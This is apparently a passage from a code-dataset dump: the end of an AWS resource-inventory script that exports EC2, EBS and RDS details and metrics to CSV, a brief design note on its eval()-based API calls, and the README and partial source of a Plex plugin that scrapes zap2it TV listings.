'KeyName')\n\t\t\tif 
getExistsValueKey(instance,'Platform').lower()==\"windows\":\n\t\t\t\titem_service['Platform'] = \"Windows\"\n\t\t\telse:\n\t\t\t\titem_service['Platform'] = \"Linux\"\n\t\t\titem_service['PrivateIpAddress'] = str(instance['PrivateIpAddress'])\n\t\t\titem_service['PublicIpAddress'] = getExistsValueKey(instance, 'PublicIpAddress')\n\t\t\titem_service['SubnetId'] = str(instance['SubnetId'])\n\t\t\titem_service['VpcId'] = str(instance['VpcId'])\n\t\t\titem_service['IamInstanceProfile'] = getRoleFromProfile(getExistsValueKey(instance, 'IamInstanceProfile'))\n\t\t\tstart_time = datetime.today() - timedelta(days=14)\n\t\t\tend_time = datetime.today()\n\t\t\tresponseDatapoints = describeServiceItems(client_cw, \"get_metric_statistics\", \"Datapoints\", \" Namespace='AWS/EC2', MetricName='CPUUtilization', Dimensions=[ { 'Name' : 'InstanceId', 'Value': '\"+instance['InstanceId']+\"' } ], Period=86400, Statistics=['Average'], StartTime=datetime.today() - timedelta(days=14), EndTime=datetime.today(), Unit='Percent'\")\n\t\t\tif responseDatapoints:\n\t\t\t\ttotal = 0\n\t\t\t\tfor data_point in responseDatapoints:\n\t\t\t\t\t#item_service['Avg-'+data_point['Timestamp'].strftime(\"%y-%m-%d\")] = round(data_point['Average'],2)\n\t\t\t\t\ttotal += data_point['Average']\n\t\t\t\titem_service['CPU-Total-Avg-14days'] = round(total/len(responseDatapoints),2)\n\t\t\tresponseDatapoints = describeServiceItems(client_cw, \"get_metric_statistics\", \"Datapoints\", \" Namespace='AWS/EC2', MetricName='CPUUtilization', Dimensions=[ { 'Name' : 'InstanceId', 'Value': '\"+instance['InstanceId']+\"' } ], Period=86400, Statistics=['Maximum'], StartTime=datetime.today() - timedelta(days=14), EndTime=datetime.today(), Unit='Percent'\")\n\t\t\tif responseDatapoints:\n\t\t\t\ttotal = 0\n\t\t\t\tfor data_point in responseDatapoints:\n\t\t\t\t\t#item_service['Max-'+data_point['Timestamp'].strftime(\"%y-%m-%d\")] = round(data_point['Maximum'],2)\n\t\t\t\t\ttotal += data_point['Maximum']\n\t\t\t\titem_service['CPU-Total-Avg-Max-14days'] = round(total/len(responseDatapoints),2)\n\t\t\tresponseDatapoints = describeServiceItems(client_cw, \"get_metric_statistics\", \"Datapoints\", \" Namespace='AWS/EC2', MetricName='NetworkIn', Dimensions=[ { 'Name' : 'InstanceId', 'Value': '\"+instance['InstanceId']+\"' } ], Period=86400, Statistics=['Sum'], StartTime=datetime.today() - timedelta(days=14), EndTime=datetime.today(), Unit='Bytes'\")\n\t\t\tif responseDatapoints:\n\t\t\t\ttotal = 0\n\t\t\t\tfor data_point in responseDatapoints:\n\t\t\t\t\ttotal += data_point['Sum']\n\t\t\t\titem_service['NetIn-Total-Gigabytes-14days'] = round(total/1000000000,2)\n\t\t\tresponseDatapoints = describeServiceItems(client_cw, \"get_metric_statistics\", \"Datapoints\", \" Namespace='AWS/EC2', MetricName='NetworkOut', Dimensions=[ { 'Name' : 'InstanceId', 'Value': '\"+instance['InstanceId']+\"' } ], Period=86400, Statistics=['Sum'], StartTime=datetime.today() - timedelta(days=14), EndTime=datetime.today(), Unit='Bytes'\")\n\t\t\tif responseDatapoints:\n\t\t\t\ttotal = 0\n\t\t\t\tfor data_point in responseDatapoints:\n\t\t\t\t\ttotal += data_point['Sum']\n\t\t\t\titem_service['NetOut-Total-Gigabytes-14days'] = round(total/1000000000,2)\n\t\t\tif responseInstanceRecommendations:\n\t\t\t\tinstance_recommendation = getItemFromArray('instanceArn','arn:aws:ec2:'+AWS_DEFAULT_REGION+':'+account_id+':instance/'+instance['InstanceId'],responseInstanceRecommendations)\n\t\t\t\tif instance_recommendation:\n\t\t\t\t\titem_service['Finding'] = 
instance_recommendation['finding']\n\t\t\t\t\tfor option in instance_recommendation['recommendationOptions']:\n\t\t\t\t\t\titem_service['RecommendedInstanceType'+str(option['rank'])] = option['instanceType']\n\t\t\tdataInstances.append(item_service)\n\tdf = pd.DataFrame(dataInstances)\n\tdf.to_csv(path_folder+'/ec2_instances.csv', index=False)\n\nresponseVolumes = describeServiceItems(client, \"describe_volumes\", \"Volumes\")\nif responseVolumes:\n\tdataVolumes = []\n\tfor item in responseVolumes:\n\t\titem_service = {}\n\t\titem_service['AccountId'] = account_id\n\t\titem_service['Region'] = AWS_DEFAULT_REGION\n\t\titem_service['VolumeId'] = item['VolumeId']\n\t\titem_service['VolumeType'] = item['VolumeType']\n\t\titem_service['Size'] = str(item['Size'])\n\t\titem_service['State'] = str(item['State'])\n\t\tif 'Attachments' in item and len(item['Attachments'])>0:\n\t\t\titem_service['InstanceIdAttachment'] = getExistsValueKey(item['Attachments'][0], 'InstanceId')\n\t\t\titem_service['StateAttachment'] = getExistsValueKey(item['Attachments'][0], 'State')\n\t\t\titem_service['DeviceAttachment'] = getExistsValueKey(item['Attachments'][0], 'Device')\n\t\t\titem_service['DeleteOnTerminationAttachment'] = isTrueOrFalse(getExistsValueKey(item['Attachments'][0], 'DeleteOnTermination'))\n\t\titem_service['Encrypted'] = isTrueOrFalse(item['Encrypted'])\n\t\tresponseVolumeSnapshots = describeServiceItems(client, \"describe_snapshots\", \"Snapshots\", \" Filters = [{ 'Name' : 'volume-id', 'Values' : [ '\"+item['VolumeId']+\"' ] }]\")\n\t\tif responseVolumeSnapshots:\n\t\t\titem_service['Snapshots'] = len(responseVolumeSnapshots)\n\t\t\tcurrent_time = time.mktime(datetime.utcnow().timetuple())\n\t\t\tmax_time_snapshot = 0\n\t\t\tmax_date_string = \"\"\n\t\t\tdifference_time = 0\n\t\t\tfor itemS in responseVolumeSnapshots:\n\t\t\t\tstarted_time = time.mktime(itemS['StartTime'].timetuple())\n\t\t\t\tif started_time>max_time_snapshot:\n\t\t\t\t\tmax_time_snapshot = started_time\n\t\t\t\t\tmax_date_string = itemS['StartTime'].strftime(\"%Y-%m-%d %H:%M\")\n\t\t\t\t\tdifference_time = current_time - started_time\n\t\t\titem_service['LastSnapshot'] = max_date_string\n\t\telse:\n\t\t\titem_service['Snapshots'] = 0\n\t\t\titem_service['LastSnapshot'] = \"\"\n\t\tdataVolumes.append(item_service)\n\tdf = pd.DataFrame(dataVolumes)\n\tdf.to_csv(path_folder+'/ec2_volumes.csv', index=False)\n\n\nresponseSnapshots = describeServiceItems(client, \"describe_snapshots\", \"Snapshots\", \" Filters = [{ 'Name' : 'owner-id', 'Values' : [ '\"+account_id+\"' ] }]\")\nif responseSnapshots:\n\tdataSnapshots = []\n\tfor item in responseSnapshots:\n\t\titem_service = {}\n\t\titem_service['AccountId'] = account_id\n\t\titem_service['Region'] = AWS_DEFAULT_REGION\n\t\titem_service['SnapshotId'] = item['SnapshotId']\n\t\titem_service['StartTime'] = item['StartTime'].strftime(\"%Y-%m-%d %H:%M\")\n\t\titem_service['State'] = item['State']\n\t\titem_service['Progress'] = item['Progress']\n\t\titem_service['VolumeId'] = item['VolumeId']\n\t\titem_service['VolumeSize'] = item['VolumeSize']\n\t\titem_service['Description'] = item['Description']\n\t\titem_service['Encrypted'] = item['Encrypted']\n\t\titem_service['VolumeExists'] = isValueInArray(item['VolumeId'],dataVolumes,'VolumeId')\n\t\tdataSnapshots.append(item_service)\n\tdf = pd.DataFrame(dataSnapshots)\n\tdf.to_csv(path_folder+'/ec2_snapshots.csv', index=False)\n\nresponseReservedInstances = describeServiceItems(client, \"describe_reserved_instances\", 
\"ReservedInstances\")\nif responseReservedInstances:\n\tdataReservedInstances = []\n\tfor item in responseReservedInstances:\n\t\titem_service = {}\n\t\titem_service['AccountId'] = account_id\n\t\titem_service['Region'] = AWS_DEFAULT_REGION\n\t\tri_scope = item['Scope']\n\t\tif existsKey(item, 'AvailabilityZone'):\n\t\t\tri_scope = ri_scope + \" - \" + item['AvailabilityZone']\n\t\titem_service['ReservedInstancesId'] = str(item['ReservedInstancesId'])\n\t\titem_service['InstanceCount'] = str(item['InstanceCount'])\n\t\titem_service['InstanceType'] = item['InstanceType']\n\t\titem_service['Scope'] = ri_scope\n\t\titem_service['State'] = item['State']\n\t\titem_service['Duration'] = str(item['Duration']/60/60/24)\n\t\titem_service['OfferingClass'] = item['OfferingClass']\n\t\titem_service['OfferingType'] = item['OfferingType']\n\t\titem_service['Start'] = item['Start'].strftime(\"%Y-%m-%d %H:%m\")\n\t\titem_service['End'] = item['End'].strftime(\"%Y-%m-%d %H:%m\")\n\t\titem_service['ProductDescription'] = item['ProductDescription']\n\t\titem_service['UsagePrice'] = item['UsagePrice']\n\t\titem_service['CurrencyCode'] = str(item['CurrencyCode'])\n\t\titem_service['FixedPrice'] = item['FixedPrice']\n\t\tstr_charge = ''\n\t\tc = 0\n\t\tfor charge in item['RecurringCharges']:\n\t\t\tif c < len(item['RecurringCharges']) and c > 0:\n\t\t\t\tstr_charge += \" | \"\n\t\t\tstr_charge = str_charge + \"Amount:\" + str(charge['Amount']) + ' _ ' + \"Frequency\" + charge['Frequency']\n\t\t\tc = c +1\n\t\titem_service['RecurringCharges'] = str_charge\n\t\tdataReservedInstances.append(item_service)\n\tdf = pd.DataFrame(dataReservedInstances)\n\tdf.to_csv(path_folder+'/ec2_reserved_instances.csv', index=False)\n\n######################################################################\n###################################################################### AMAZON RDS\n######################################################################\n\nclient = session.client('rds')\n\nresponseDBInstances = describeServiceItems(client, \"describe_db_instances\", \"DBInstances\")\nif responseDBInstances:\n\tdataDBInstances = []\n\tfor item in responseDBInstances:\n\t\titem_service = {}\n\t\titem_service['AccountId'] = account_id\n\t\titem_service['Region'] = AWS_DEFAULT_REGION\n\t\titem_service['DBInstanceIdentifier'] = item[\"DBInstanceIdentifier\"]\n\t\titem_service['DBName'] = getExistsValueKey(item, \"DBName\")\n\t\titem_service['MasterUsername'] = item[\"MasterUsername\"]\n\t\titem_service['Engine'] = item[\"Engine\"]\n\t\titem_service['EngineVersion'] = item[\"EngineVersion\"]\n\t\titem_service['LicenseModel'] = item[\"LicenseModel\"]\n\t\titem_service['MultiAZ'] = isTrueOrFalse(item[\"MultiAZ\"])\n\t\titem_service['AvailabilityZone'] = item[\"AvailabilityZone\"]\n\t\titem_service['PubliclyAccessible'] = isTrueOrFalse(item[\"PubliclyAccessible\"])\n\t\titem_service['DBInstanceClass'] = item[\"DBInstanceClass\"]\n\t\titem_service['StorageType'] = item[\"StorageType\"]\n\t\titem_service['AllocatedStorage'] = str(item[\"AllocatedStorage\"])\n\t\titem_service['StorageEncrypted'] = isTrueOrFalse(item[\"StorageEncrypted\"])\n\t\titem_service['BackupRetentionPeriod'] = str(item[\"BackupRetentionPeriod\"])\n\t\titem_service['InstanceCreateTime'] = str(item[\"InstanceCreateTime\"])\n\t\tif \"Endpoint\" in item:\n\t\t\titem_service['Endpoint'] = item[\"Endpoint\"][\"Address\"]\n\t\t\titem_service['Port'] = str(item[\"Endpoint\"][\"Port\"])\n\t\telse:\n\t\t\titem_service['Endpoint'] = ''\n\t\t\titem_service['Port'] = 
''\n\t\t\n\t\tresponseDatapoints = describeServiceItems(client_cw, \"get_metric_statistics\", \"Datapoints\", \" Namespace='AWS/RDS', MetricName='CPUUtilization', Dimensions=[ { 'Name' : 'DBInstanceIdentifier', 'Value': '\"+item[\"DBInstanceIdentifier\"]+\"' } ], Period=86400, Statistics=['Average'], StartTime=datetime.today() - timedelta(days=14), EndTime=datetime.today(), Unit='Percent'\")\n\t\tif responseDatapoints:\n\t\t\ttotal = 0\n\t\t\tfor data_point in responseDatapoints:\n\t\t\t\ttotal += data_point['Average']\n\t\t\titem_service['CPU-Total-Avg-14days'] = round(total/len(responseDatapoints),2)\n\t\tresponseDatapoints = describeServiceItems(client_cw, \"get_metric_statistics\", \"Datapoints\", \" Namespace='AWS/RDS', MetricName='CPUUtilization', Dimensions=[ { 'Name' : 'DBInstanceIdentifier', 'Value': '\"+item[\"DBInstanceIdentifier\"]+\"' } ], Period=86400, Statistics=['Maximum'], StartTime=datetime.today() - timedelta(days=14), EndTime=datetime.today(), Unit='Percent'\")\n\t\tif responseDatapoints:\n\t\t\ttotal = 0\n\t\t\tfor data_point in responseDatapoints:\n\t\t\t\ttotal += data_point['Maximum']\n\t\t\titem_service['CPU-Total-Avg-Max-14days'] = round(total/len(responseDatapoints),2)\n\t\t\t\n\t\tresponseDatapoints = describeServiceItems(client_cw, \"get_metric_statistics\", \"Datapoints\", \" Namespace='AWS/RDS', MetricName='FreeableMemory', Dimensions=[ { 'Name' : 'DBInstanceIdentifier', 'Value': '\"+item[\"DBInstanceIdentifier\"]+\"' } ], Period=86400, Statistics=['Average'], StartTime=datetime.today() - timedelta(days=14), EndTime=datetime.today(), Unit='Bytes'\")\n\t\tif responseDatapoints:\n\t\t\ttotal = 0\n\t\t\tfor data_point in responseDatapoints:\n\t\t\t\ttotal += data_point['Average']\n\t\t\titem_service['FreeableMemory-Total-Avg-14days'] = round((total/len(responseDatapoints))/1000000000,2)\n\t\tresponseDatapoints = describeServiceItems(client_cw, \"get_metric_statistics\", \"Datapoints\", \" Namespace='AWS/RDS', MetricName='FreeableMemory', Dimensions=[ { 'Name' : 'DBInstanceIdentifier', 'Value': '\"+item[\"DBInstanceIdentifier\"]+\"' } ], Period=86400, Statistics=['Maximum'], StartTime=datetime.today() - timedelta(days=14), EndTime=datetime.today(), Unit='Bytes'\")\n\t\tif responseDatapoints:\n\t\t\ttotal = 0\n\t\t\tfor data_point in responseDatapoints:\n\t\t\t\ttotal += data_point['Maximum']\n\t\t\titem_service['FreeableMemory-Total-Avg-Max-14days'] = round((total/len(responseDatapoints))/1000000000,2)\n\t\t\t\n\t\tdataDBInstances.append(item_service)\n\tdf = pd.DataFrame(dataDBInstances)\n\tdf.to_csv(path_folder+'/rds_instances.csv', index=False)\n\nresponseReservedDBInstances = describeServiceItems(client, \"describe_reserved_db_instances\", \"ReservedDBInstances\")\nif responseReservedDBInstances:\n\tdataReservedDBInstances = []\n\tfor item in responseReservedDBInstances:\n\t\titem_service = {}\n\t\titem_service['AccountId'] = account_id\n\t\titem_service['Region'] = AWS_DEFAULT_REGION\n\t\titem_service['DBInstanceCount'] = item[\"DBInstanceCount\"]\n\t\titem_service['DBInstanceClass'] = item[\"DBInstanceClass\"]\n\t\titem_service['StartTime'] = item[\"StartTime\"].strftime(\"%Y-%m-%d %H:%M\")\n\t\titem_service['Duration'] = item[\"Duration\"]\n\t\titem_service['FixedPrice'] = item[\"FixedPrice\"]\n\t\titem_service['UsagePrice'] = item[\"UsagePrice\"]\n\t\titem_service['CurrencyCode'] = item[\"CurrencyCode\"]\n\t\titem_service['ProductDescription'] = item[\"ProductDescription\"]\n\t\titem_service['OfferingType'] = 
item[\"OfferingType\"]\n\t\titem_service['MultiAZ'] = isTrueOrFalse(item[\"MultiAZ\"])\n\t\titem_service['State'] = item[\"State\"]\n\t\titem_service['LeaseId'] = item[\"LeaseId\"]\n\t\tstr_charge = ''\n\t\tc = 0\n\t\tfor charge in item['RecurringCharges']:\n\t\t\tif c < len(item['RecurringCharges']) and c > 0:\n\t\t\t\tstr_charge += \" | \"\n\t\t\tstr_charge = str_charge + \"Amount:\" + str(charge['RecurringChargeAmount']) + ' _ ' + \"Frequency\" + charge['RecurringChargeFrequency']\n\t\t\tc = c +1\n\t\titem_service['RecurringCharges'] = str_charge\n\t\tdataDBInstances.append(item_service)\n\tdf = pd.DataFrame(dataReservedDBInstances)\n\tdf.to_csv(path_folder+'/rds_reserved_instances.csv', index=False)"
}
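A design note on aws_summary.py above: describeServiceItems builds every API call with eval() and follows NextToken by recursion, which works but only fails at runtime if a filter string has a typo. boto3 ships paginators that handle the token loop natively; a minimal sketch of that alternative for one of the calls above, assuming default credentials are configured:

import boto3

ec2 = boto3.client('ec2')
reservations = []
for page in ec2.get_paginator('describe_instances').paginate():
    reservations.extend(page['Reservations'])  # same shape the script iterates over
print('reservations:', len(reservations))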
] | 2 |
PlexHaxx/plex.zap2it
|
https://github.com/PlexHaxx/plex.zap2it
|
8ad7a37f7f7ef3122dba1e4f1db3ade6ec6f9f75
|
8fddbd2bd9a3b943589f304da85a569a8aa10b12
|
4d55dc2ea7261f505e3495689063cc0e95e4e88f
|
refs/heads/master
| 2021-01-17T21:48:20.465701 | 2009-06-03T20:30:43 | 2009-06-03T20:30:43 | null | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.6532333493232727,
"alphanum_fraction": 0.6879100203514099,
"avg_line_length": 17.719297409057617,
"blob_id": "152074ad6b0ba73e09cb5e05b09b3fbd84b62e79",
"content_id": "fbc4a454d0808d0f99733feaf056dda29c508069",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 1067,
"license_type": "no_license",
"max_line_length": 57,
"num_lines": 57,
"path": "/README.mkd",
"repo_name": "PlexHaxx/plex.zap2it",
"src_encoding": "UTF-8",
"text": "###Plex Plugin Name###\nZap2it\n\n###Author and Contact Information###\nspaceman\n\n###Category###\nVideos\n\n###Description###\nElectronic Programming Guide for Canada and USA\n\n###Version###\n0.10 uploaded April 22nd 2009\n\n###Change Log###\n####Version 0.1####\n* initial version\n\n####Version 0.2####\n* fixed midnight GMT issue\n\n####Version 0.3####\n* fixed 25 o'clock being displayed as midnight approaches\n\n####Version 0.4####\n* added option for 12 hour time format\n\n####Version 0.5####\n* added option to show/hide programmes in progress\n* improved caching\n* various fixes\n\n####Version 0.6####\n* Main menu shows next 12 hours\n* Added menu for next seven days\n\n####Version 0.7####\n* Hide and show selected channels\n\n####Version 0.8####\n* Search\n\n####Version 0.9####\n* Favourite shows float to top of list\n* Search fixes\n\n####Version 0.10####\n* Option to hide same show on different channels\n* Fixes for end times and in progress dupes\n\n###Setup###\n* Choose Settings\n* Enter your ZIP or Postal Code\n* Select your provider\n* Select your preferred time format\n* Return to main menu\n"
},
{
"alpha_fraction": 0.5805011987686157,
"alphanum_fraction": 0.5918146371841431,
"avg_line_length": 36.860069274902344,
"blob_id": "1b64dfcce09364b6b407e8418b2a42fe7e146718",
"content_id": "c982f8b1662e8aed93766864274d53157dcae4a4",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 22186,
"license_type": "no_license",
"max_line_length": 183,
"num_lines": 586,
"path": "/Zap2it.bundle/Contents/Code/__init__.py",
"repo_name": "PlexHaxx/plex.zap2it",
"src_encoding": "UTF-8",
"text": "from PMS import *\nfrom PMS.Objects import *\nfrom PMS.Shortcuts import *\n\nimport re, string, datetime, time, calendar, pickle, operator\n\nPLUGIN_PREFIX = '/video/zap2it'\nDAY_PREFIX = PLUGIN_PREFIX + '/day'\nSEARCH_PREFIX = PLUGIN_PREFIX + '/search'\nPROVIDER_INDEX = 'http://tvlistings.zap2it.com/tvlistings/ZCGrid.do?aid=zap2it&isDescriptionOn=true'\nSEARCH_INDEX = 'http://tvlistings.zap2it.com/tvlistings/ZCSearch.do?searchType=simple&searchTerm='\nSHOW_INDEX = 'http://tvlistings.zap2it.com'\nDAY = 86400\nCACHE_TIME = DAY\n\n# art-default from http://www.flickr.com/photos/kchrist/117806012\n# licensed as CC Attribution-Noncommercial 2.0 Generic\n\n####################################################################################################\n\ndef Start():\n Plugin.AddPrefixHandler(PLUGIN_PREFIX, MainMenu, L('Zap2it'), 'icon-default.gif', 'art-default.jpg')\n \n Plugin.AddViewGroup('Details', viewMode='InfoList', mediaType='items')\n Plugin.AddViewGroup('EpisodeList', viewMode='Episodes', mediaType='items')\n \n MediaContainer.title1 = L('Zap2it')\n MediaContainer.viewGroup = 'EpisodeList'\n MediaContainer.art = R('art-default.jpg')\n \n HTTP.SetCacheTime(CACHE_TIME)\n \n####################################################################################################\n\ndef CreateDict():\n Dict.Set('shows', dict())\n \ndef CreatePrefs():\n addPref('channels', 'text', dict(), L('Channels')) # dict\n addPref('postalCode', 'text', '', L('Postal Code'))\n addPref('provider', 'text', '', L('Provider'))\n addPref('timeFormat', 'text', '24', L('Time Format'))\n addPref('collapseShows', 'text', False, L('Collapse Shows'))\n addPref('inProgress', 'text', True, L('In Progress')) # bool\n addPref('favourites', 'text', list(), L('Favourites')) # list\n \n####################################################################################################\n\ndef UpdateCache():\n # Get TV Page\n if getPref('postalCode') == '' or getPref('provider') == '' or getPref('timeFormat') == '':\n return\n now = getCurrentTimeSlot()\n \n shows = Dict.Get('shows')\n if shows == None:\n Dict.Set('shows', dict())\n shows = Dict.Get('shows')\n \n # remove old slots\n for slot in shows.iterkeys():\n if slot < now: del shows[slot]\n \n # populate new slots\n for slot in range(now, now + DAY, 3 * 3600):\n grabListings(slot, shows)\n\n # populate channel dict\n channels = getPref('channels')\n if type(channels) != type(dict):\n channels = dict()\n\n url = PROVIDER_INDEX + '&zipcode=' + getPref('postalCode') + '&lineupId=' + getPref('provider')\n for td in GetXML(url, True).xpath('//td[starts-with(@class,\"zc-st\")]'):\n channelNum = int(td.xpath('descendant::span[@class=\"zc-st-n\"]')[0].text)\n channelName = td.xpath('descendant::span[@class=\"zc-st-c\"]')[0].text\n if not channelNum in channels:\n channels[channelNum] = dict(name=channelName, enabled=True)\n \n setPref('channels', channels)\n \n\n####################################################################################################\n\n# TODO: Add day to non-today menus\n# TODO: Link to saved folder\n\ndef MainMenu():\n dir = MediaContainer()\n dir.nocache = 1\n \n if getPref('postalCode') != '' and getPref('provider') != '' and getPref('timeFormat') != '':\n nextTime = getCurrentTimeSlot()\n Plugin.AddPathRequestHandler(PLUGIN_PREFIX, TVMenu, '')\n \n for k in range(24):\n dir.Append(DirectoryItem(nextTime, timeToDisplay(nextTime), thumb=R('blank-black.gif')))\n nextTime = nextTime + 1800\n dir.Append(Function(DirectoryItem(daysMenu, 
title=L('Another day'), thumb=R('blank-black.gif'))))\n dir.Append(Function(SearchDirectoryItem(searchMenu, title=L('Search'), prompt=L('Enter show name'))))\n \n dir.Append(Function(DirectoryItem(settingsMenu, title=L('Settings'), thumb=R('icon-settings.png'))))\n return dir\n\n#################################################################################################### \n \ndef timeToDisplay(t):\n ''' Turns a POSIX time into a human readable local time'''\n # Adjust to local time\n if time.daylight != 0:\n t = t - time.altzone \n else:\n t = t - time.timezone\n \n t = t % DAY \n hour = (t // 3600) % 24\n minute = (t % 3600) // 60\n #Log(str(hour) + ':' + str(minute))\n if getPref('timeFormat') == '12':\n if hour >= 12:\n meridian = 'PM'\n else:\n meridian = 'AM'\n if hour > 12:\n hour = hour - 12\n if hour == 0:\n hour = 12\n \n else:\n meridian = ''\n \n return str(hour) + ':' + str(minute).zfill(2) + ' ' + meridian\n\ndef getCurrentTimeSlot():\n '''@return current time rounded down to nearest half hour'''\n now = calendar.timegm(time.gmtime())\n now = now - (now % 1800)\n return now\n \ndef meridianRangeTo24hour(s):\n (start, stop) = s.split('-')\n (stopTime, meridian) = re.match(r'(\\d+:\\d+)(\\w\\w)', stop).groups()\n if meridian == 'pm':\n baseHour = 12\n else:\n baseHour = 0\n \n (startHour, startMinute) = start.split(':')\n (stopHour, stopMinute) = stopTime.split(':')\n \n startHour = int(startHour) + baseHour\n stopHour = int(stopHour) + baseHour\n # 11:30-1:30AM -> 11:30-01:30 -> 23:30-01:30\n # 11:30-1:30PM -> 23:30-13:30 -> 11:30-13:30\n if startHour > stopHour: startHour = (startHour - 12) % 24\n \n start24 = str(startHour).zfill(2) + ':' + startMinute\n stop24 = str(stopHour).zfill(2) + ':' + stopMinute\n \n return start24 + '-' + stop24\n\n####################################################################################################\n\ndef searchMenu(sender, query):\n dir = MediaContainer()\n Plugin.AddPathRequestHandler(SEARCH_PREFIX, showMenu, '', '', '')\n \n shows = GetXML(SEARCH_INDEX + String.Quote(query, True), True).xpath('//li[@class=\"zc-sr-l\"]')\n if len(shows) == 0:\n # Here there was only one result\n shows = GetXML(SEARCH_INDEX + String.Quote(query, True), True).xpath('//table[@class=\"zc-episode\"]')\n if len(shows) == 0:\n return movieMenu(SEARCH_INDEX + String.Quote(query, True))\n return grabShows(shows)\n \n # here there were multiple results\n for show in shows:\n name = show.xpath('child::a')[0].text\n description = show.xpath('child::span')[0].text\n link = show.xpath('child::a')[0].get('href')\n dir.Append(DirectoryItem(SEARCH_PREFIX + '/' + String.Encode(link) , title=name + ' ' + description))\n return dir\n\ndef showMenu(pathNouns, path):\n shows = GetXML(SHOW_INDEX + String.Decode(pathNouns[0]), True).xpath('//table[@class=\"zc-episode\"]')\n if len(shows) == 0:\n return movieMenu(SHOW_INDEX + String.Decode(pathNouns[0]))\n return grabShows(shows)\n \n\ndef grabShows(shows):\n dir = MediaContainer()\n dir.viewGroup = 'Details'\n channels = getPref('channels')\n for show in shows:\n name = show.xpath('descendant::span[@class=\"zc-program-episode\"]')[0]\n try:\n name = name.xpath('child::a')[0].text\n except:\n name = name.text.strip()\n description = show.xpath('descendant::span[@class=\"zc-program-description\"]')[0].text + '\\n'\n times = show.xpath('descendant::table[@class=\"zc-episode-times\"]')[0].xpath('descendant::tr')\n for aTime in times:\n channel = aTime.xpath('child::td[@class=\"zc-channel\"]')[0]\n if channel.text != 
None:\n channel = channel.text\n else:\n channel = channel.xpath('child::span')[0].text\n #Log(channel)\n if channels[int(channel)]['enabled']:\n description = description + '\\n' + aTime.xpath('child::td[@class=\"zc-sche-date\"]')[0].text \n \n timeRange = aTime.xpath('child::td[@class=\"zc-sche-time\"]')[0].text\n if getPref('timeFormat') == '24':\n timeRange = meridianRangeTo24hour(timeRange)\n description = description + ' ' + timeRange\n description = description + ' ' + channel\n channelName = aTime.xpath('child::td[@class=\"zc-callsign\"]')[0]\n try:\n description = description + ' ' + channelName.text\n except:\n description = description + ' ' + channelName.xpath('child::span')[0].text\n dir.Append(Function(DirectoryItem(noMenu, title=name, summary=description)))\n return dir\n \ndef movieMenu(url):\n dir = MediaContainer()\n dir.viewGroup = 'Details'\n page = GetXML(url, True)\n name = page.xpath('//h1[@id=\"zc-program-title\"]')[0].text\n description = page.xpath('//p[@id=\"zc-program-description\"]')[0].text + '\\n\\n'\n channels = getPref('channels')\n for aTime in page.xpath('//div[@id=\"zc-sc-ep-list\"]')[0].xpath('child::ol[starts-with(@class,\"zc-sc-ep-list-r\")]'):\n channel = aTime.xpath('descendant::li[@class=\"zc-sc-ep-list-l zc-sc-ep-list-chn\"]')[0].text\n if channels[int(channel)]['enabled']:\n description = description + ' ' + aTime.xpath('descendant::li[@class=\"zc-sc-ep-list-l zc-sc-ep-list-wd\"]')[0].text\n description = description + ' ' + aTime.xpath('descendant::li[@class=\"zc-sc-ep-list-l zc-sc-ep-list-md\"]')[0].text\n \n timeRange = aTime.xpath('descendant::li[@class=\"zc-sc-ep-list-l zc-sc-ep-list-stet\"]')[0].text\n if getPref('timeFormat') == '24':\n timeRange = meridianRangeTo24hour(timeRange)\n description = description + ' ' + timeRange\n \n description = description + ' ' + channel\n description = description + ' ' + aTime.xpath('descendant::li[@class=\"zc-sc-ep-list-l zc-sc-ep-list-call\"]')[0].text + '\\n'\n dir.Append(Function(DirectoryItem(noMenu, title=name, summary=description)))\n return dir\n \n####################################################################################################\n\ndef settingsMenu(sender):\n dir = MediaContainer()\n dir.title2 = L('Settings')\n dir.nocache = 1\n dir.Append(Function(SearchDirectoryItem(setPostalCode, title=L('PostalCodeTitle'), prompt=L('PostalCodePrompt'))))\n if getPref('postalCode') != '':\n dir.Append(Function(PopupDirectoryItem(providerMenu, title=L('Provider'))))\n if getPref('provider') != '': \n dir.Append(Function(PopupDirectoryItem(timeFormatMenu, title=L('Time Format'))))\n dir.Append(Function(PopupDirectoryItem(inProgressMenu, title=L('Shows in progress'))))\n #if len(hideChannelsMenu(0)) != 0:\n dir.Append(Function(DirectoryItem(hideChannelsMenu, title=L('Hide Channels'))))\n #if len(showChannelsMenu(0)) != 0:\n dir.Append(Function(DirectoryItem(showChannelsMenu, title=L('Show Channels'))))\n dir.Append(Function(DirectoryItem(AddFavouritesMenu, title=('Add Favourites'))))\n dir.Append(Function(PopupDirectoryItem(collapseShowsMenu, title=L('Duplicates'))))\n \n favourites = getPref('favourites')\n if len(favourites) != 0:\n dir.Append(Function(DirectoryItem(RemoveFavouritesMenu, title=L('Remove Favourites'))))\n return dir\n\n####################################################################################################\n \ndef setPostalCode(sender, query):\n query = string.join(query.split(' '),'') # No spaces please\n setPref('postalCode', query)\n return\n 
\n####################################################################################################\n\ndef providerMenu(sender):\n    dir = MediaContainer()\n    url = 'http://tvlistings.zap2it.com/tvlistings/ZBChooseProvider.do?zipcode=' + getPref('postalCode') + '&method=getProviders'\n    providers = XML.ElementFromString(HTTP.Request(url=url, cacheTime=CACHE_TIME), True).xpath('//a[starts-with(@href, \"ZCGrid.do?method=decideFwdForLineup\")]')\n    for provider in providers:\n        dir.Append(Function(DirectoryItem(setProvider, title=provider.text)))\n    return dir\n    \ndef setProvider(sender):\n    Log(sender.itemTitle)\n    url = 'http://tvlistings.zap2it.com/tvlistings/ZBChooseProvider.do?zipcode=' + getPref('postalCode') + '&method=getProviders'\n\n    setProviderURL = XML.ElementFromString(HTTP.Request(url=url, cacheTime=CACHE_TIME), True).xpath('//a[text() = \"' + sender.itemTitle + '\"]')[0].get('href')\n    #Log(re.search(r'lineupId=(.*)', setProviderURL).group(1))\n    #Log(type(re.search(r'lineupId=(.*)', setProviderURL).group(1)))\n    setPref('provider', re.search(r'lineupId=(.*)', setProviderURL).group(1))\n    \n    UpdateCache()\n    return\n\n####################################################################################################\n\ndef timeFormatMenu(sender):\n    dir = MediaContainer()\n    dir.Append(Function(DirectoryItem(setTimeFormat, title='12' + L('hour'))))\n    dir.Append(Function(DirectoryItem(setTimeFormat, title='24' + L('hour'))))\n    return dir\n\ndef setTimeFormat(sender):\n    timeFormat = re.match(r'(\\d\\d).*', sender.itemTitle).group(1)\n    setPref('timeFormat', timeFormat)\n    